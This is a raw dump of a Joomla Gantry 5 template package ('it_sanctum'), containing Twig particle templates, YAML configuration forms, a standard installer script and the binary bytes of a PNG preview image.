                            <div class="g-block">
                        {% endif %}
                            <a target="{{ item.socialtarget|default('_blank')|e }}" href="{{ item.facebook|e }}" aria-label="Facebook"><i class="fa fa-facebook"></i></a>
                        {% if particle.style|default("style1") == "style1" %}
                            </div>
                        {% endif %}
                    {% endif %}

                    {% if item.twitter %}
                        {% if particle.style|default("style1") == "style1" %}
                            <div class="g-block">
                        {% endif %}
                            <a target="{{ item.socialtarget|default('_blank')|e }}" href="{{ item.twitter|e }}" aria-label="Twitter"><i class="fa fa-twitter"></i></a>
                        {% if particle.style|default("style1") == "style1" %}
                            </div>
                        {% endif %}
                    {% endif %}

                    {% if item.googleplus %}
                        {% if particle.style|default("style1") == "style1" %}
                            <div class="g-block">
                        {% endif %}
                            <a target="{{ item.socialtarget|default('_blank')|e }}" href="{{ item.googleplus|e }}" aria-label="Google+"><i class="fa fa-google-plus"></i></a>
                        {% if particle.style|default("style1") == "style1" %}
                            </div>
                        {% endif %}
                    {% endif %}

                    {% if item.linkedin %}
                        {% if particle.style|default("style1") == "style1" %}
                            <div class="g-block">
                        {% endif %}
                            <a target="{{ item.socialtarget|default('_blank')|e }}" href="{{ item.linkedin|e }}" aria-label="LinkedIn"><i class="fa fa-linkedin"></i></a>
                        {% if particle.style|default("style1") == "style1" %}
                            </div>
                        {% endif %}
                    {% endif %}

                    {% if item.dribbble %}
                        {% if particle.style|default("style1") == "style1" %}
                            <div class="g-block">
                        {% endif %}
                            <a target="{{ item.socialtarget|default('_blank')|e }}" href="{{ item.dribbble|e }}" aria-label="Dribbble"><i class="fa fa-dribbble"></i></a>
                        {% if particle.style|default("style1") == "style1" %}
                            </div>
                        {% endif %}
                    {% endif %}

                    {% if item.email %}
                        {% if particle.style|default("style1") == "style1" %}
                            <div class="g-block">
                        {% endif %}
                            {%- if item.emailbehaviour|default("link") == "link" -%}
                                <a target="{{ item.socialtarget|default('_blank')|e }}" href="mailto:{{ item.email|e }}" aria-label="Email"><i class="fa fa-envelope"></i></a>
                            {%- else -%}
                                <a data-uk-tooltip title="{{ item.email|e }}" aria-label="Email"><i class="fa fa-envelope"></i></a>
                            {%- endif -%}
                        {% if particle.style|default("style1") == "style1" %}
                            </div>
                        {% endif %}
                    {% endif %}

                    {% if item.phone %}
                        {% if particle.style|default("style1") == "style1" %}
                            <div class="g-block">
                        {% endif %}
                            {%- if item.phonebehaviour|default("link") == "link" -%}
                                <a href="tel:{{ item.phone|e }}" aria-label="Phone"><i class="fa fa-phone"></i></a>
                            {%- else -%}
                                <a data-uk-tooltip title="{{ item.phone|e }}" aria-label="Phone"><i class="fa fa-phone"></i></a>
                            {%- endif -%}
                        {% if particle.style|default("style1") == "style1" %}
                            </div>
                        {% endif %}
                    {% endif %}
                {% endset %}

                {% set membername %}
                    <h4 class="g-our-team-name">
                        {%- if item.link -%}
                            <a target="{{ item.nametarget|default('_parent')|e }}" href="{{ item.link|e }}">
                        {%- endif -%}
                            {{- item.membername|raw -}}
                        {%- if item.link -%}
                            </a>
                        {%- endif -%}
                    </h4>
                {% endset %}

                {% set position %}
                    <div class="g-our-team-position{% if item.position and item.description %} g-desc-enabled{% endif %}">
                        {{- item.position|raw -}}
                    </div>
                {% endset %}

                {% set description %}
                    <div class="g-our-team-desc">
                        {{- item.description|raw -}}
                    </div>
                {% endset %}

                {% set style1 %}
                    <div class="g-our-team-item{% if item.facebook or item.twitter or item.googleplus or item.linkedin or item.dribbble or item.email %} uk-overlay uk-overlay-hover{% endif %}">
                        {% if item.image %}
                            <div class="g-our-team-image">
                                {{ image }}

                                {% if item.facebook or item.twitter or item.googleplus or item.linkedin or item.dribbble or item.email %}
                                    <div class="g-our-team-social uk-overlay-panel uk-overlay-background uk-overlay-bottom uk-overlay-slide-bottom">
                                        <div class="g-grid">
                                            {{ socialicons }}
                                        </div>
                                    </div>
                                {% endif %}
                            </div>
                        {% endif %}
                        {% if item.name or item.description or item.position %}
                            <div class="g-info-container">
                                {% if item.membername %}
                                    {{ membername }}
                                {% endif %}

                                {% if item.position %}
                                    {{ position }}
                                {% endif %}

                                {% if item.description %}
                                    {{ description }}
                                {% endif %}
                            </div>
                        {% endif %}                         
                    </div>
                {% endset %}

                {% set style2 %}
                    <div class="g-our-team-item">
                        {% if item.image %}
                            <div class="g-our-team-image">
                                {{ image }}
                            </div>
                        {% endif %}

                        {% if item.name or item.description or item.position %}
                            <div class="g-info-container">
                                {% if item.membername %}
                                    {{ membername }}
                                {% endif %}

                                {% if item.position %}
                                    {{ position }}
                                {% endif %}

                                {% if item.description %}
                                    {{ description }}
                                {% endif %}

                                {% if item.facebook or item.twitter or item.googleplus or item.linkedin or item.dribbble or item.email %}
                                    <div class="g-our-team-social">
                                        {{ socialicons }}
                                    </div>
                                {% endif %}
                            </div>
                        {% endif %}                     
                    </div>
                {% endset %}

                {% set style3 %}
                    <div class="g-our-team-item">
                        {% if item.image %}
                            <div class="g-our-team-image">
                                {{ image }}
                            </div>
                        {% endif %}

                        {% if item.name or item.position %}
                            <div class="g-info-container">
                                {% if item.membername %}
                                    {{ membername }}
                                {% endif %}

                                {% if item.position %}
                                    {{ position }}
                                {% endif %}
                            </div>
                        {% endif %}

                        {% if item.description or item.facebook or item.twitter or item.googleplus or item.linkedin or item.dribbble or item.email %}
                            <div class="g-hover-container">
                                {% if item.description %}
                                    {{ description }}
                                {% endif %}

                                {% if item.facebook or item.twitter or item.googleplus or item.linkedin or item.dribbble or item.email %}
                                    <div class="g-our-team-social">
                                        {{ socialicons }}
                                    </div>
                                {% endif %}
                            </div>
                        {% endif %}                    
                    </div>
                {% endset %}

                {% if particle.behaviour|default('static') == 'static' %}
                    <div class="g-block{% if item.class %} {{ item.class|e }}{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
                        <div {% if particle.gutter|default('enabled') == 'enabled' %}class="g-content"{% endif %}>
                            {% if particle.style|default("style1") == "style1" %}{{ style1 }}{% endif %}
                            {% if particle.style|default("style1") == "style2" %}{{ style2 }}{% endif %}
                            {% if particle.style|default("style1") == "style3" %}{{ style3 }}{% endif %}
                        </div>
                    </div>
                {% endif %}

                {% if particle.behaviour|default('static') == 'slider' or particle.behaviour|default('static') == 'slideset' %}
                    <li {% if item.class %}class="{{ item.class|e }}"{% endif %} {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
                        {% if particle.style|default("style1") == "style1" %}{{ style1 }}{% endif %}
                        {% if particle.style|default("style1") == "style2" %}{{ style2 }}{% endif %}
                        {% if particle.style|default("style1") == "style3" %}{{ style3 }}{% endif %}
                    </li>
                {% endif %}

            {% endfor %}
        {% if particle.behaviour|default('static') == 'static' %}</div>{% endif %}
    {% endfor %}
{% endset %}

{% block particle %}
	
	{% if particle.behaviour|default('static') == 'static' %}
		<div class="g-our-team {{ particle.style|default("style1")|e }}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
            {% if particle.mainheading or particle.introtext %}
                {{ particleheading }}
            {% endif %}
            {{ ourteamitems }}
		</div>
	{% endif %}
	{% if particle.behaviour|default('static') == 'slider' %}
		<div class="g-our-team-slider {{ particle.style|default("style1")|e }}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
            {% if particle.mainheading or particle.introtext %}
                {{ particleheading }}
            {% endif %}	    	
			<div class="uk-slidenav-position" data-uk-slider{% if particle.autoplay|default("disable") == "enable" %}="{autoplay:true}"{% endif %}>
				<div class="uk-slider-container">
					<ul class="uk-slider{% if particle.gutter|default('enabled') == 'enabled' %} uk-grid{% endif %} uk-grid-width-medium-1-{{ particle.columns|default('3')|e }}">
                        {{ ourteamitems }}
					</ul>
				</div>
                {% if (particle.navigation|default('arrows') == 'arrows') or (particle.navigation|default('arrows') == 'both') %}
                    <div class="g-particle-navigation">
                        <a href="" class="uk-slidenav uk-slidenav-previous" data-uk-slider-item="previous" aria-label="{{'Previous'|trans_key('IT_ACCESS_PREVIOUS')}}"></a>
                        <a href="" class="uk-slidenav uk-slidenav-next" data-uk-slider-item="next" aria-label="{{'Next'|trans_key('IT_ACCESS_NEXT')}}"></a>
                    </div>
                {% endif %}
			</div>		    	
		</div>
	{% endif %}
	{% if particle.behaviour|default('static') == 'slideset' %}
		<div class="g-our-team-slideset {{ particle.style|default("style1")|e }}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
            {% if particle.mainheading or particle.introtext %}
                {{ particleheading }}
            {% endif %}		    	
			<div class="uk-slidenav-position" data-uk-slideset="{small: 1, medium: {{ particle.columns|default('3')|e }}, large: {{ particle.columns|default('3')|e }}, duration: {{ particle.duration|default(200)|e}}, {% if particle.autoplay|default("disable") == "enable" %}autoplay: 'true',{% endif %} animation: '{{ particle.animation|default('fade')|e}}'}">
				<div class="uk-slider-container">
					<ul class="uk-slideset uk-grid">
                        {{ ourteamitems }}
					</ul>
				</div>
                {% if (particle.navigation|default('arrows') == 'arrows') or (particle.navigation|default('arrows') == 'both') %}
                    <div class="g-particle-navigation">
                        <a href="" class="uk-slidenav uk-slidenav-previous" data-uk-slideset-item="previous" aria-label="{{'Previous'|trans_key('IT_ACCESS_PREVIOUS')}}"></a>
                        <a href="" class="uk-slidenav uk-slidenav-next" data-uk-slideset-item="next" aria-label="{{'Next'|trans_key('IT_ACCESS_NEXT')}}"></a>
                    </div>
                {% endif %}
                {% if (particle.navigation|default('arrows') == 'dots') or (particle.navigation|default('arrows') == 'both') %}
                    <ul class="uk-slideset-nav uk-dotnav uk-flex-center">
                    {% set counter = 0 %}
                    {% for item in particle.items %}
                        <li data-uk-slideset-item="{{ counter }}"><a href="" aria-label="{{'Item'|trans_key('IT_ACCESS_ITEM')}} {{ counter }}"></a></li>
                        {% set counter = counter + 1 %}
                    {% endfor %}
                    </ul>
                {% endif %}
			</div>		    	
		</div>
	{% endif %}
{% endblock %}PK!��Hʈ�$it_sanctum/particles/uikit.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% block particle %}
    {% assets in 'head' with { priority: 11 } %}
        {% if particle.enabled %}
            <link rel="stylesheet" href="{{ url('gantry-theme://uikit/css/uikit.min.css') }}" type="text/css"/>
        {% endif %}
    {% endassets -%}

    {% assets in particle.jslocation|default('footer') with { priority: 10 } %}
        {% if particle.enabled %}
            {% do gantry.load('jquery') %}
            <script src="{{ url('gantry-theme://uikit/js/uikit.min.js') }}" type="text/javascript"></script>
        {% endif %}
    {% endassets -%}
{% endblock %}PK!|/+Y""#it_sanctum/particles/portfolio.yamlnu&1i�name: Portfolio
description: Display portfolio.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Portfolio particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    mainheading:
      type: input.text
      label: Title
      description: Type in the title.
      placeholder: 'Enter Title'
      default: ''

    introtext:
      type: textarea.textarea
      label: Intro Text
      description: Type in the intro text.
      placeholder: 'Enter Intro Text'
      default: ''

    style:
      type: select.select
      label: Style
      description: Select the style which defines the particle layout on the frontend.
      placeholder: 'Select...'
      default: style1
      options:
        style1: Style 1
        style2: Style 2
        style3: Style 3
        style4: Style 4

    columns:
      type: select.select
      label: Columns
      description: Select the number of items per row (columns).
      placeholder: 'Select...'
      default: 3
      options:
        1: 1
        2: 2
        3: 3
        4: 4
        5: 5
        6: 6
        10: 10

    gutter:
      type: select.select
      label: Gutter
      description: Enable or disable the Portfolio gutter (to have space between the items or not).
      placeholder: 'Select...'
      default: enabled
      options:
        enabled: Enabled
        disabled: Disabled

    lightbox:
      type: select.select
      label: Lightbox
      description: Enable or disable the image lightbox/popup.
      placeholder: 'Select...'
      default: enable
      options:
        enable: Enabled
        disable: Disabled
        disablelink: Disabled (Item Link)

    filters:
      type: select.select
      label: Filters
      description: Enable or disable the Portfolio filters.
      placeholder: 'Select...'
      default: disabled
      options:
        enabled: Enabled
        enabled2: Enabled - Counter 1
        enabled3: Enabled - Counter 2
        disabled: Disabled

    filterall:
      type: input.text
      label: Filter "All"
      description: Type in the Filter 'All' name. This filter shows all items. You can use this field to translate the text in your language.
      placeholder: 'Enter Filter Name'
      default: 'All'

    filter1:
      type: input.text
      label: Filter 1
      description: Type in the Filter 1 name. Here you create the filters and then you assign them to the Portfolio items. It is similar to tags.
      placeholder: 'Enter Filter Name'
      default: ''

    filter2:
      type: input.text
      label: Filter 2
      description: Type in the Filter 2 name. Here you create the filters and then you assign them to the Portfolio items. It is similar to tags.
      placeholder: 'Enter Filter Name'
      default: ''

    filter3:
      type: input.text
      label: Filter 3
      description: Type in the Filter 3 name. Here you create the filters and then you assign them to the Portfolio items. It is similar to tags.
      placeholder: 'Enter Filter Name'
      default: ''

    filter4:
      type: input.text
      label: Filter 4
      description: Type in the Filter 4 name. Here you create the filters and then you assign them to the Portfolio items. It is similar to tags.
      placeholder: 'Enter Filter Name'
      default: ''

    filter5:
      type: input.text
      label: Filter 5
      description: Type in the Filter 5 name. Here you create the filters and then you assign them to the Portfolio items. It is similar to tags.
      placeholder: 'Enter Filter Name'
      default: ''

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Portfolio Items
      description: Create each Portfolio item to display.
      value: name
      ajax: true

      fields:

        .image:
          type: input.imagepicker
          label: Image
          description: Select an image.

        .alt:
          type: input.text
          label: Image Alt Tag

        .video:
          type: input.text
          label: Video URL
          description: Paste the video URL. If a video URL is added to this field, the modal window will load the video instead of the image.

        .title:
          type: input.text
          label: Title

        .link:
          type: input.text
          label: Title Link

        .target:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
            _parent: Self
            _blank: New Window

        .description:
          type: textarea.textarea
          label: Description

        .date:
          type: input.text
          label: Date
          description: Enter the date that you want to be associated with this item. The field is mostly used as a 'Published Date'. Being able to type in the date manually gives you a great flexibility as you can show the exact format you want.

        .specialtext:
          type: input.text
          label: Special Text

        .icon:
          type: input.icon
          label: Special Icon
          description: Choose an icon to be placed in front of 'Special Text'.

        .bottomlink:
          type: input.text
          label: Bottom Link
          description: Enter the clickable text you want to be shown. The link is the URL you enter in the 'Title Link' field above.

        .filter1:
          type: input.checkbox
          label: Filter 1
          description: Assign Filter 1 to this item. It is similar to tags.
          default: 0

        .filter2:
          type: input.checkbox
          label: Filter 2
          description: Assign Filter 2 to this item. It is similar to tags.
          default: 0

        .filter3:
          type: input.checkbox
          label: Filter 3
          description: Assign Filter 3 to this item. It is similar to tags.
          default: 0

        .filter4:
          type: input.checkbox
          label: Filter 4
          description: Assign Filter 4 to this item. It is similar to tags.
          default: 0

        .filter5:
          type: input.checkbox
          label: Filter 5
          description: Assign Filter 5 to this item. It is similar to tags.
          default: 0

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']PK!uu����.it_sanctum/particles/scrollreveal-js.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% block javascript_footer %}
	{% if particle.enabled %}
		{{ parent() }}
		<script src="{{ url('gantry-theme://js/scrollReveal.min.js') }}" type="text/javascript"></script>
		<script type="text/javascript">
			window.sr = new scrollReveal({ mobile: {{ particle.mobile|default("false")|e }} });
		</script>
	{% endif %}
{% endblock %}PK!'�o�,,$it_sanctum/particles/page-title.yamlnu&1i�name: Page Title
description: Display a Page Title.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Call-to-action particles.
      default: true

    title:
      type: input.text
      label: Title
      description: Type in the title text.
      placeholder: Enter title

    description:
      type: textarea.textarea
      label: Description
      description: Type in the description text.
      placeholder: Enter description

    icon:
      type: input.icon
      label: Title Icon
      description: Select an icon for the title.

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']PK!��f!!)it_sanctum/particles/scrollreveal-js.yamlnu&1i�name: ScrollReveal.js
description: Configure ScrollReveal.js.
type: atom

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable ScrollReveal.js particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: 'This Atom adds the <a href="https://scrollrevealjs.org/" target="_blank">ScrollReveal.js</a> functionality to your website.<br />ScrollReveal.js is a library to easily reveal elements as they enter the viewport (OnScroll Animations).'

    mobile:
      type: select.select
      label: Mobile
      description: Enable or disable the animations on mobile devices.
      placeholder: 'Select...'
      default: "false"
      options:
        "true": Enabled
        "false": DisabledPK!��YY$it_sanctum/particles/icon-fonts.yamlnu&1i�name: Icon Fonts
description: Configure Icon Fonts.
type: atom

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Icon Fonts particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: 'This Atom loads the following Icon Fonts so you can use their classes (icons) in all Icon Picker fields.<br /><br /><a href="https://octicons.github.com/" target="_blank">Github Octicons</a><br /><a href="http://themes-pixeden.com/font-demos/7-stroke/" target="_blank">Icon Stroke 7</a><br /><a href="http://ionicons.com/" target="_blank">Ionicons</a><br /><a href="https://themify.me/themify-icons" target="_blank">Themify Icons</a><br /><a href="http://www.typicons.com/" target="_blank">Typicons</a><br /><a href="http://samcome.github.io/webfont-medical-icons/" target="_blank">Webfont Medical Icons</a>'

    load:
      type: container.set
      label: Enable
      fields:
        .octicons:
          type: enable.enable
          label: Github Octicons
          default: 0
        .strokeicon7:
          type: enable.enable
          label: Icon Stroke 7
          default: 0
        .ionicons:
          type: enable.enable
          label: Ionicons
          default: 0
        .themify:
          type: enable.enable
          label: Themify Icons
          default: 0
        .typicons:
          type: enable.enable
          label: Typicons
          default: 0
        .medical:
          type: enable.enable
          label: Medical Icons
          default: 0PK! �
vv(it_sanctum/particles/googlemap.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set indentifier = random() %}

{% block particle %}
    <div class="g-googlemap{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %} >
        <div id="g-map-{{ indentifier|e }}" style="width: {{ particle.width|e }}; height: {{ particle.height|e }};">
        </div>
    </div>
{% endblock %}

{% block javascript_footer %}
    {{ parent() }}
    <script type="text/javascript" src="https://maps.googleapis.com/maps/api/js{% if particle.apikey %}?key={{ particle.apikey|e|trim }}{% endif %}"></script>
    <script type="text/javascript">
        function initialize{{ indentifier|e }}() {

            var latlng = new google.maps.LatLng({{ particle.latitude|e }},{{ particle.longitude|e }});

            {% if particle.dragging|default('enabled') == 'enabled' %}
                var isDraggable = 1;
            {% elseif particle.dragging|default('enabled') == 'disabledmobile' %}
                {% do gantry.load('jquery') %}
                var isDraggable = jQuery(document).width() > 767 ? true : 0;
            {% else %}
                var isDraggable = 0;
            {% endif %}

            var myOptions =
            {
                zoom: {{ particle.zoom|e }},
                center: latlng,
                mapTypeId: google.maps.MapTypeId.{{ particle.maptype|default('ROADMAP')|e }},

                {% if particle.snazzymaps %}
                    styles: {{ particle.snazzymaps|raw }},
                {% endif %}

                scrollwheel: {{ particle.scrollwheel|default(0)|e }},
                draggable: isDraggable
            };

            var map = new google.maps.Map(document.getElementById("g-map-{{ indentifier|e }}"), myOptions);

            {% if particle.defaultmarker|default('show') == 'show' %}
                var myMarker = new google.maps.Marker(
                {
                    position: latlng,
                    map: map,
                });

                var contentString = '{{ particle.markertext|e('js') }}';

                var infowindow = new google.maps.InfoWindow({
                    content: contentString
                });

                {% if particle.markertext %}
                    myMarker.addListener('click', function() {
                        infowindow.open(map, myMarker);
                    });

                    {% if particle.markerstate|default(1) %}
                        infowindow.open(map, myMarker);
                    {% endif %}
                {% endif %}
            {% endif %}

            {% for marker in particle.markers %}
                {% set marker_id = random() %}

                var myMarker{{ marker_id|e }} = new google.maps.Marker(
                {
                    position: {lat: {{ marker.latitude|e }}, lng: {{ marker.longitude|e }}},
                    map: map,
                });

                var contentString{{ marker_id|e }} = '{{ marker.markertext|e('js') }}';

                var infowindow{{ marker_id|e }} = new google.maps.InfoWindow({
                    content: contentString{{ marker_id|e }}
                });

                {% if marker.markertext %}
                myMarker{{ marker_id|e }}.addListener('click', function() {
                    infowindow{{ marker_id|e }}.open(map, myMarker{{ marker_id|e }});
                });

                    {% if marker.markerstate|default(1) %}
                        infowindow{{ marker_id|e }}.open(map, myMarker{{ marker_id|e }});
                    {% endif %}
                {% endif %}

                {% endfor %}

            // Resize stuff...
            google.maps.event.addDomListener(window, "resize", function() {
                var center = map.getCenter();
                google.maps.event.trigger(map, "resize");
                map.setCenter(center); 
            });

        }
        google.maps.event.addDomListener(window, 'load', initialize{{ indentifier|e }});
        
    </script>
{% endblock %}PK!����it_sanctum/install.phpnu&1i�<?php
/**
 * @package   Gantry 5 Theme
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2016 RocketTheme, LLC
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

defined('_JEXEC') or die;

class IT_SanctumInstallerScript
{
    public $requiredGantryVersion = '5.3.2';

    /**
     * @param string $type
     * @param object $parent
     * @return bool
     * @throws Exception
     */
    public function preflight($type, $parent)
    {
        if ($type == 'uninstall') {
            return true;
        }

        $manifest = $parent->getManifest();
        $name = JText::_($manifest->name);

        // Prevent installation if Gantry 5 isn't enabled or is too old for this template.
        try {
            if (!class_exists('Gantry5\Loader')) {
                throw new RuntimeException(sprintf('Please install Gantry 5 Framework before installing %s template!', $name));
            }

            Gantry5\Loader::setup();

            $gantry = Gantry\Framework\Gantry::instance();

            if (!method_exists($gantry, 'isCompatible') || !$gantry->isCompatible($this->requiredGantryVersion)) {
                throw new \RuntimeException(sprintf('Please upgrade Gantry 5 Framework to v%s (or later) before installing %s template!', strtoupper($this->requiredGantryVersion), $name));
            }

        } catch (Exception $e) {
            $app = JFactory::getApplication();
            $app->enqueueMessage(JText::sprintf($e->getMessage()), 'error');

            return false;
        }

        return true;
    }

    /**
     * @param string $type
     * @param object $parent
     * @throws Exception
     */
    public function postflight($type, $parent)
    {
        $installer = new Gantry\Framework\ThemeInstaller($parent);
        $installer->initialize();

        // Install sample data on first install.
        if (in_array($type, array('install', 'discover_install'))) {
            try {
                $installer->installDefaults();

                echo $installer->render('install.html.twig');

            } catch (Exception $e) {
                $app = JFactory::getApplication();
                $app->enqueueMessage(JText::sprintf($e->getMessage()), 'error');
            }
        } else {
            echo $installer->render('update.html.twig');
        }

        $installer->finalize();
    }

    /**
     * Called by TemplateInstaller to customize post-installation.
     *
     * @param \Gantry\Framework\ThemeInstaller $installer
     */
    public function installDefaults(Gantry\Framework\ThemeInstaller $installer)
    {
        // Create default outlines etc.
        $installer->createDefaults();
    }

    /**
     * Called by TemplateInstaller to customize sample data creation.
     *
     * @param \Gantry\Framework\ThemeInstaller $installer
     */
    public function installSampleData(Gantry\Framework\ThemeInstaller $installer)
    {
        // Create sample data.
        $installer->createSampleData();
    }
}
PK!��@�@�it_sanctum/template_preview.pngnu&1i��PNG


IHDR�����tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:6CD2FC42858C11E689D4B9D79D28841C" xmpMM:DocumentID="xmp.did:6CD2FC43858C11E689D4B9D79D28841C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6CD2FC40858C11E689D4B9D79D28841C" stRef:documentID="xmp.did:6CD2FC41858C11E689D4B9D79D28841C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>���ӴIDATx��	�%Gu&'2�V���k��n�HBb�%��x����0��`3��|`���?c��-0���g�`c��,�@B�Z�I�Twu׾�Z�͌�"32"#r��Jխ�!U߾�7of�s��"k֬Y{�۝oz�c�|���U�6Fp�[�%��F}�7���#��O�=����c5�M�u��77�r���u�<~L�q6�c��J%��Y{&X��XBVb~K�^g~�Ѝt���//u�����[n͚�g�!��c�9�C�~_��;w���k]��'���ڬժv)[�fMs
�ֺ+�DӘ�jԛ��A1�HH�B�aI{�������:^��W�lSW���}�PׁŹ��fOo__OG��;u��޽�Y��+��/�5�GN�V��x�E
vU[�f���<��v�_�����}�;��L��ص�����˴Z�l��q1�6�^Z�<r�Ķ��V�uo����?������/9=�����C{�_\������r��s�Û�KsS��zvk֬E^�T.��T+����_���ga���3���w�6p�����˶��+�:�hb�J��!p�����iu��U��t�����W��c�W쫸�I���_��:z���ޜ��㇏_���;�?���� ��#�y�k�
�f��?r��񉙥��S?(�n��R��Y������-�c��>xf�Woy�%��cR��8���ͩ/|ٿ���_�bw�xu���w9���{G�]�+�w����X�ڋk{�������V�<�����˷����Y}�R�.J/�w�˚
�^yյ��\<�e��?n�]e�<����{��G��|����+��=���f���i͚5߃�m�{w:��N:~�W��[�Z+���'Eҽ����g?�/]/yY�e�����˯,1���}���;�pba�U/𦗪����d��zW�;:{JN�p�o.{����Ӄ[v��Z��׼�q��{�=�v���k%g�#��
�4��f�k,�f��]�֬ٸ���8����7�8��?��~�:4�\�c���u�u�l���'+Ͻ~������O��������ڥW�+��b��]��}e���u�į	��t�x��P��9��&��c��p�7�	,�ݚ�g�}�
���W�Y��N����ᅍS��O��TFp�[�ӛ���,���\\��+P*�����,q�A����N��/.�ET��(�w��%���ona���-���N���ّh�!xg� ��.kk֬%�H��<��瞚��ћ���*��V���s�-�"�+"P�@~�_j��<��T�mb�f��3�;!��x�{j�s��D{ϓmֹ[�f�a���W����1����m��[Y9��U�߸�(v���xs;�l��k:��v�[��L���;�s�[��t�]n�
.۸���th�<{�<��uk֬=�-�y��2����+�k͚5kO?��ok֬Y��ݚ5k֬Y�n͚5k֬s�f͚5kֹ[�f͚5�ܭY�f�:wk֬Y�f��5k֬Y��ݚ5k֬Y�n͚5k֬s�f͚5���%�f͚5�ܭY�f͚u�֬Y�f�:wk֬Y�f��5k֬Y��ݚ5k֬s�f͚5kֹ[�f͚5�ܭY�f͚u�֬)c���G��95������~�{�*Y��h�������~r�k	��~��f��ʎm�Plz�?�q��]z� hN͸�=�]��sg���@;j�=��Y{F�k/����s���ޝ�=;��o���ޟ~�����i������ʭ��
�K;����Q�S�L�uW�����Y��ݚ��|�qfrχ������_t\���>��t�je��#���j��?�h�Ko���/G/���^KkOc������=��h���K>�ѩ��:������mc7��'��42�cv�
�����{}/����ܝo��7�Kg�c�{�^{�=�l���;�/�u�E���V�oY9v�9>��qx\��-�,�l���4��o�<v�~��w���α�ep��f/�5�[��d"k6i�����/~���>��u]wU�s�>��/n���^~����/�i�J��Ftz�;.�_�;��_�ƈ��7�z����.{��=]�R�]ؾ�glqI�95�MM{s���F������w~��
�>��?�ffw�j�v��e��a����7n���Ͽ�o	�V��ڶ忼�vT��46�X��SKJ�0\��q�=��{���y�ܿw^|��?�f���W�>�w��<����R��(9��ʝ{`�������ip��Wo�|�e�[Ց��
